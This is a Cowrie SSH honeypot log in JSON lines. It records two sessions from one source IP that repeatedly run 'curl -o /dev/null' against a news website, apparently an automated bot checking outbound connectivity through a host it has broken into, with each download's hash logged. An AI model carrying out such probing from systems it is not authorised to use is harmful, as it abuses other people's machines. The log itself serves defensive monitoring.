{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:30:09.404593Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:09.405621Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:30:09.427990Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:30:09.434377Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:30:09.435627Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:09.436296Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:30:09.446638Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:09.447638Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:30:09.473659Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:09.474842Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:30:09.478803Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:30:09.481081Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:30:09.487332Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:09.488565Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:30:09.516418Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:09.517529Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:30:09.527046Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:09.528046Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:30:09.532876Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:30:09.545711Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:30:09.552408Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:09.553068Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:30:09.569452Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:09.570580Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:30:09.574149Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:30:09.587122Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:30:09.591122Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:09.592081Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:30:09.594117Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:30:09.601985Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:30:09.610021Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:30:09.614086Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:09.615047Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:30:09.622014Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:30:09.627803Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:09.628860Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:30:09.632236Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:30:09.636934Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:30:09.651472Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:30:09.653265Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:09.654781Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:30:09.667440Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:09.668532Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:30:09.674830Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:30:09.678144Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:30:09.693397Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:09.694484Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:30:09.705538Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:09.706681Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:30:09.710885Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:30:09.713474Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:30:09.716438Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:30:09.734577Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:09.735681Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:30:09.742746Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:30:09.744504Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:09.745214Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:30:09.746878Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:30:09.783928Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:09.785324Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:30:09.790845Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:30:09.793070Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:09.794037Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:30:09.815210Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:30:09.826421Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:30:09.839558Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:09.840880Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:30:09.847448Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:09.848521Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:30:09.852685Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:30:09.856148Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:30:09.876066Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:30:09.891998Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:09.893161Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:30:09.898351Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:09.899827Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:30:09.904166Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:30:09.942136Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:30:09.944567Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
